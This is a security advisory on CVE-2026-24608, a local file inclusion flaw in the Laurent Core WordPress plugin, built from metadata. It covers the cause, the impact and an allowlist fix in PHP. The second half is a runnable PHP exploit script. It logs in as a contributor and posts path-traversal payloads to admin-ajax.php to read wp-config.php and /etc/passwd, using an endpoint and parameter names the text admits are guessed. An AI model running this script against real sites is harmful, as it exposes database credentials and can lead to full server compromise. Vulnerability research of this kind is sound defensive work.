Atomic Edge analysis of CVE-2026-24608 (metadata-based):
The Laurent Core WordPress plugin version 2.4.1 and earlier contains an authenticated Local File Inclusion vulnerability. Attackers with contributor-level or higher privileges can exploit this flaw to include arbitrary local files, potentially leading to remote code execution. The CVSS 3.1 score of 7.5 (High) reflects the significant impact when combined with file upload capabilities.
Atomic Edge research indicates the root cause is CWE-98: Improper Control of Filename for Include/Require Statement. The plugin likely uses user-controlled input to construct file paths for PHP include/require statements without proper validation. This inference is based on the CWE classification and vulnerability description. The plugin fails to sanitize or validate file path parameters before passing them to PHP file inclusion functions. No code diff confirms this, but the CWE pattern matches typical WordPress plugin vulnerabilities where dynamic template loading or file retrieval mechanisms accept unsanitized input.
Exploitation requires authenticated access at the contributor level or higher. Attackers would identify a vulnerable endpoint, likely an AJAX handler or admin page that accepts a file path parameter. They would send a crafted request containing a local file path (e.g., ../../wp-config.php) or a path to an uploaded file containing PHP code. The plugin includes and executes the specified file’s contents. Common WordPress endpoints for such vulnerabilities include /wp-admin/admin-ajax.php with an action parameter like laurent_core_action, or direct access to plugin files in /wp-content/plugins/laurent-core/.
Remediation requires implementing strict validation of user-supplied file paths. The plugin should restrict included files to a whitelist of allowed files within the plugin directory. Path traversal sequences (../) must be filtered. The plugin should use the basename() function to extract only filenames, not full paths. Input validation should occur before any file system operations. WordPress nonce verification and capability checks should also be present, though the vulnerability description suggests these were insufficient.
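One way to implement the allowlist and path validation described above, shown as an added example and not Laurent Core's code or its patch. The function name, template keys and temporary directory are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example, not Laurent Core's code: all names below are hypothetical.
declare(strict_types=1);

/**
 * Map a user-supplied template key to a file path that is safe to include.
 * Returns null when the key is not allowlisted or the file escapes $baseDir.
 */
function resolve_template(string $key, string $baseDir, array $allowlist): ?string
{
    // 1. Allowlist lookup: the request selects a key, never a path.
    if (!isset($allowlist[$key])) {
        return null;
    }
    // 2. Canonicalise both sides. realpath() resolves ../ and symlinks
    //    and returns false for files that do not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowlist[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment check on the canonical path, in case an allowlist
    //    entry or a symlink points outside the template directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary template directory holding one template.
$dir = sys_get_temp_dir() . '/lc_templates_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/card.php', '<?php echo "card template\n";');
$allow = ['card' => 'card.php']; // hypothetical template keys

foreach (['card', '../../../wp-config.php', '/etc/passwd', 'card.php'] as $input) {
    $resolved = resolve_template($input, $dir, $allow);
    printf("%-24s => %s\n", $input, $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}
// In a WordPress AJAX handler, run check_ajax_referer() and current_user_can()
// before this lookup, then include only the returned path.
unlink($dir . '/card.php');
rmdir($dir);
```

Only the key `card` resolves to a file. The traversal string, the absolute path and the bare filename are all rejected because none of them is an allowlist key.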
Successful exploitation leads to arbitrary PHP code execution on the server. Attackers can read sensitive files like wp-config.php containing database credentials. They can execute operating system commands. The vulnerability description notes attackers can combine this with file upload capabilities to include uploaded malicious files. This bypasses WordPress security controls and can result in complete site compromise, data theft, and server takeover.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24608 - Laurent Core <= 2.4.1 - Authenticated (Contributor+) Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2026-24608
 * Assumptions based on CWE-98 and WordPress plugin patterns:
 * 1. The plugin has an AJAX endpoint vulnerable to LFI
 * 2. The endpoint accepts a file path parameter
 * 3. Contributor-level authentication is required
 * 4. Nonce verification may be present but insufficient
 */
$target_url = 'https://target-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check if login succeeded by looking for dashboard elements
if (strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Attempt exploitation via assumed AJAX endpoint
// Based on plugin slug, likely action parameter is 'laurent_core_*'
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Test 1: Path traversal to read wp-config.php
$payload = [
    'action' => 'laurent_core_load_template', // Inferred parameter name
    'file' => '../../../wp-config.php', // Path traversal payload
    // Nonce parameter may be required but is omitted here as vulnerability may bypass it
    '_wpnonce' => '' // Placeholder for nonce if required
];
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
$response = curl_exec($ch);

// Check for evidence of successful inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "[SUCCESS] wp-config.php likely included. Response snippet:\n";
    echo substr($response, 0, 500) . "...\n";
} else {
    echo "[INFO] Initial payload may have failed. Trying alternative endpoints.\n";
    // Test 2: Alternative parameter names common in WordPress plugins
    $alternative_params = ['template', 'path', 'include', 'view', 'page'];
    foreach ($alternative_params as $param) {
        $payload = [
            'action' => 'laurent_core_action',
            $param => '../../../../etc/passwd'
        ];
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
        $response = curl_exec($ch);
        if (strpos($response, 'root:') !== false) {
            echo "[SUCCESS] LFI successful with parameter '$param'.\n";
            break;
        }
    }
}
curl_close($ch);
unlink('cookies.txt');
?>